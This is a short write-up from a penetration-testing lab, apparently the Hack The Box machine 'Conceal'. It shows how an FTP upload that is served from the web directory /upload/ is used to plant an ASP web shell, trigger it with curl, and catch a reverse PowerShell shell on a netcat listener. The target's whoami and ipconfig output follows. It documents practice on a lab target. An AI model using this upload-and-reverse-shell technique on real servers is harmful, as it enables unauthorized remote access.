InfoSec LAB

Conceal_Exploitation

Created: 2 min read

File Upload

I am able to upload to the FTP server There is also a web directory named, /upload/

It is possible that the FTP server is serving the web directory, /upload/ or the /upload/ directory is serving/mirroring the FTP server root

Either way, I can confirm that by uploading a test file through the FTP server and checking the web directory

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ echo 'hi there!' > test.txt
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************|    11      210.63 kib/s    --:-- ETA
226 Transfer complete.
11 bytes sent in 00:00 (0.33 KiB/s)

The test file, test.txt, uploaded to the FTP server

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ curl http://$IP/upload/test.txt
hi there!

The theory is confirm. The FTP server is serving the web directory, /upload/

Exploitation

ftp> put shell.asp 
local: shell.asp remote: shell.asp
229 Entering Extended Passive Mode (|||49701|)
125 Data connection already open; Transfer starting.
100% |*****************|   625       12.16 MiB/s    --:-- ETA
226 Transfer complete.
625 bytes sent in 00:00 (14.46 KiB/s)

I uploaded the payload to the FTP server

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ curl http://$IP/upload/shell.asp

Triggering the payload

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.116] 49746
 
PS C:\Windows\SysWOW64\inetsrv> whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv> hostname
Conceal
PS C:\Windows\SysWOW64\inetsrv> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::243
   IPv6 Address. . . . . . . . . . . : dead:beef::3d73:e77b:9e2f:732d
   Temporary IPv6 Address. . . . . . : dead:beef::8132:4c8a:f844:c799
   Link-local IPv6 Address . . . . . : fe80::3d73:e77b:9e2f:732d%12
   IPv4 Address. . . . . . . . . . . : 10.10.10.116
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%12
                                       10.10.10.2

Initial Foothold established to the target system as destitute

Interactive Graph View

Backlinks